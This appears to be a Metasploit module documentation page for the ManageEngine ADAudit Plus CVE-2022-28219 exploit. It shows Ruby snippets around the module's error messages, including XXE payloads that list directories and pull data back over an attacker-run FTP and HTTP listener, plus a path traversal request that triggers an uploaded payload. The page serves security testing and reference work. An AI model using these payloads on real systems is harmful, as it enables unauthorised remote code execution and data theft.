122: # List the /users folder - this is good to do first, since we can fail early
123: # if something isn't working
124: vprint_status('Attempting to exploit XXE to get a list of users')
125: users = get_directory_listing('/users')
126: unless users
127: fail_with(Failure::NotVulnerable, 'Failed to get a list of users (check your DOMAIN, or server may not be vulnerable)')
128: end
129:
130: # Remove common users
131: users -= ['Default', 'Default User', 'All Users', 'desktop.ini', 'Public']
132: if users.empty?
Failed to find any non-default user accounts
Here is a relevant code snippet related to the "Failed to find any non-default user accounts" error message:
128: end
129:
130: # Remove common users
131: users -= ['Default', 'Default User', 'All Users', 'desktop.ini', 'Public']
132: if users.empty?
133: fail_with(Failure::NotFound, 'Failed to find any non-default user accounts')
134: end
135: print_status("User accounts discovered: #{users.join(', ')}")
136:
137: # I can't figure out how to properly encode spaces, but using the 8.3
138: # version works! This converts them
Exploit appeared to work, but could not find the payload on the target
Here is a relevant code snippet related to the "Exploit appeared to work, but could not find the payload on the target" error message:
167: possible_payloads = search_for_payloads(users)
168: possible_payloads -= existing_payloads
169:
170: # Make sure the payload exists
171: if possible_payloads.empty?
172: fail_with(Failure::Unknown, 'Exploit appeared to work, but could not find the payload on the target')
173: end
174:
175: # If multiple payloads appeared, abort for safety
176: if possible_payloads.length > 1
177: fail_with(Failure::UnexpectedReply, "Found #{possible_payloads.length} apparent payloads in temp folders - aborting!")
Found <POSSIBLE_PAYLOADS.LENGTH> apparent payloads in temp folders - aborting!
Here is a relevant code snippet related to the "Found <POSSIBLE_PAYLOADS.LENGTH> apparent payloads in temp folders - aborting!" error message:
172: fail_with(Failure::Unknown, 'Exploit appeared to work, but could not find the payload on the target')
173: end
174:
175: # If multiple payloads appeared, abort for safety
176: if possible_payloads.length > 1
177: fail_with(Failure::UnexpectedReply, "Found #{possible_payloads.length} apparent payloads in temp folders - aborting!")
178: end
179:
180: # Execute the one payload
181: payload_path = possible_payloads.pop
182: print_status("Triggering payload: #{payload_path}...")
Path traversal request failed with HTTP/<VALUE>
Here is a relevant code snippet related to the "Path traversal request failed with HTTP/<VALUE>" error message:
185: 'method' => 'GET',
186: 'uri' => "#{datastore['TARGETURI_DESERIALIZATION']}?img=#{'/..' * datastore['PATH_TRAVERSAL_DEPTH']}#{payload_path}"
187: )
188:
189: if res&.code != 200
190: fail_with(Failure::Unknown, "Path traversal request failed with HTTP/#{res&.code}")
191: end
192: ensure
193: # Kill the upload thread
194: if t
195: begin
XXE request to get directory listing failed with HTTP/<VALUE>
Here is a relevant code snippet related to the "XXE request to get directory listing failed with HTTP/<VALUE>" error message:
233: 'ctype' => 'application/json',
234: 'data' => create_json_request("<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE data [<!ENTITY % file SYSTEM \"file:#{folder}\"><!ENTITY % start \"<![CDATA[\"><!ENTITY % end \"]]>\"><!ENTITY % dtd SYSTEM \"#{full_url}\"> %dtd;]><data>&send;</data>")
235: )
236:
237: if res&.code != 200
238: fail_with(Failure::Unknown, "XXE request to get directory listing failed with HTTP/#{res&.code}")
239: end
240:
241: ftp_client = nil
242: begin
243: # Wait for a connection with a timeout
FTP reverse connection for directory enumeration failed - <FTP_URL>
Here is a relevant code snippet related to the "FTP reverse connection for directory enumeration failed - <FTP_URL>" error message:
242: begin
243: # Wait for a connection with a timeout
244: select_result = ::IO.select([ftp_server], nil, nil, datastore['FtpCallbackTimeout'])
245:
246: unless select_result && !select_result.empty?
247: print_warning("FTP reverse connection for directory enumeration failed - #{ftp_url}")
248: return nil
249: end
250:
251: # Accept the connection
252: ftp_client = ftp_server.accept
Did not receive data from our reverse FTP connection
Here is a relevant code snippet related to the "Did not receive data from our reverse FTP connection" error message:
262:
263: # Check if we ran out of data
264: if !select_result || select_result.empty?
265: # If we got nothing, we're sad
266: if directory_listing.nil? || directory_listing.empty?
267: print_warning('Did not receive data from our reverse FTP connection')
268: return nil
269: end
270:
271: # If we have data, we're happy and can break
272: break
Didn't receive expected FTP connection
Here is a relevant code snippet related to the "Didn't receive expected FTP connection" error message:
321: end
322: end
323:
324: # Handle FTP errors (which thankfully aren't as common as they used to be)
325: unless ftp_client
326: print_warning("Didn't receive expected FTP connection")
327: return nil
328: end
329:
330: if directory_listing.nil? || directory_listing.empty?
331: vprint_warning('FTP client connected, but we did not receive any data over the socket')
FTP client connected, but we did not receive any data over the socket
Here is a relevant code snippet related to the "FTP client connected, but we did not receive any data over the socket" error message:
326: print_warning("Didn't receive expected FTP connection")
327: return nil
328: end
329:
330: if directory_listing.nil? || directory_listing.empty?
331: vprint_warning('FTP client connected, but we did not receive any data over the socket')
332: return nil
333: end
334:
335: # Remove PORT commands, split at \r\n or \n, and remove empty elements
336: directory_listing.gsub(/PORT [0-9,]+[\r\n]/m, '').split(/\r?\n/).reject(&:empty?)
Couldn't get directory listing for <DIR>
Here is a relevant code snippet related to the "Couldn't get directory listing for <DIR>" error message:
340: return users.flat_map do |u|
341: dir = "/users/#{u}/appdata/local/temp"
342: # This will search for the payload, but right now just print stuff
343: listing = get_directory_listing(dir)
344: unless listing
345: vprint_warning("Couldn't get directory listing for #{dir}")
346: next []
347: end
348:
349: listing
350: .select { |f| f =~ /^jar_cache[0-9]+.tmp$/ }
XXE request to upload file did not receive a reverse connection on <SRVPORT_HTTP2>
Here is a relevant code snippet related to the "XXE request to upload file did not receive a reverse connection on <SRVPORT_HTTP2>" error message:
370: )
371:
372: # Wait for the reverse connection, with a timeout
373: select_result = ::IO.select([http_server], nil, nil, datastore['HttpUploadTimeout'])
374: unless select_result && !select_result.empty?
375: fail_with(Failure::Unknown, "XXE request to upload file did not receive a reverse connection on #{datastore['SRVPORT_HTTP2']}")
376: end
377:
378: # Receive and discard the HTTP request
379: c = http_server.accept
380: c.recv(1024)
XXE request to upload payload failed with HTTP/<VALUE>
Here is a relevant code snippet related to the "XXE request to upload payload failed with HTTP/<VALUE>" error message:
408: 'ctype' => 'application/json',
409: 'data' => create_json_request("<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE data [<!ENTITY % xxe SYSTEM \"jar:#{full_url}\"> %xxe;]>")
410: )
411:
412: if res&.code != 200
413: fail_with(Failure::Unknown, "XXE request to upload payload failed with HTTP/#{res&.code}")
414: end
415:
416: return t
417: end
418:
Go back to menu.
Related Pull Requests
- #16982 Merged Pull Request: Update Dell iDRAC login scanner to work with v8 and v9
- #17032 Merged Pull Request: Add module for pfSense pfBlockNG unauth RCE as root - CVE-2022-31814
- #17116 Merged Pull Request: Adding CVE-2022-22947 Spring Cloud Gateway RCE Exploit
- #17092 Merged Pull Request: netlm_downgrade: Cleanup and support non-Meterpreter sessions
- #16987 Merged Pull Request: guard for all possible RubySMBError conditions
- #17123 Merged Pull Request: netrc and fetchmailrc docs
- #17057 Merged Pull Request: Msf::Post::Windows::ExtAPI: Remove load_extapi method
References
- CVE-2022-28219
- https://www.horizon3.ai/red-team-blog-cve-2022-28219/
- https://attackerkb.com/topics/Zx3qJlmRGY/cve-2022-28219/rapid7-analysis
- https://www.manageengine.com/products/active-directory-audit/cve-2022-28219.html
See Also
Check also the following modules related to this module:
- exploit/windows/http/manageengine_adselfservice_plus_cve_2021_40539
- exploit/windows/http/manageengine_adselfservice_plus_cve_2022_28810
- exploit/windows/http/manageengine_adshacluster_rce
- exploit/windows/http/manageengine_appmanager_exec
- exploit/windows/http/manageengine_apps_mngr
- exploit/windows/http/manageengine_connectionid_write
- exploit/windows/http/manageengine_servicedesk_plus_cve_2021_44077
- exploit/windows/misc/manageengine_eventlog_analyzer_rce
- auxiliary/admin/http/manageengine_dir_listing
- auxiliary/admin/http/manageengine_file_download
- auxiliary/admin/http/manageengine_pmp_privesc
- auxiliary/gather/manageengine_adaudit_plus_xnode_enum
- auxiliary/gather/manageengine_datasecurity_plus_xnode_enum
- auxiliary/scanner/http/manageengine_desktop_central_login
- auxiliary/scanner/http/manageengine_deviceexpert_traversal
- auxiliary/scanner/http/manageengine_deviceexpert_user_creds
- auxiliary/scanner/http/manageengine_securitymanager_traversal
- exploit/multi/http/manageengine_auth_upload
- exploit/multi/http/manageengine_sd_uploader
- exploit/multi/http/manageengine_search_sqli
- post/linux/gather/manageengine_password_manager_creds
- exploit/windows/http/sitecore_xp_cve_2021_42237
- auxiliary/dos/http/webkitplus
- auxiliary/scanner/http/servicedesk_plus_traversal
- auxiliary/scanner/http/support_center_plus_directory_traversal
- auxiliary/scanner/oracle/isqlplus_login
- auxiliary/scanner/oracle/isqlplus_sidbrute
- exploit/unix/ssh/arista_tacplus_shell
- exploit/windows/fileformat/zahir_enterprise_plus_csv
Authors
- Naveen Sunkavally
- Ron Bowes
Version
This page has been produced using Metasploit Framework version 6.2.26-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.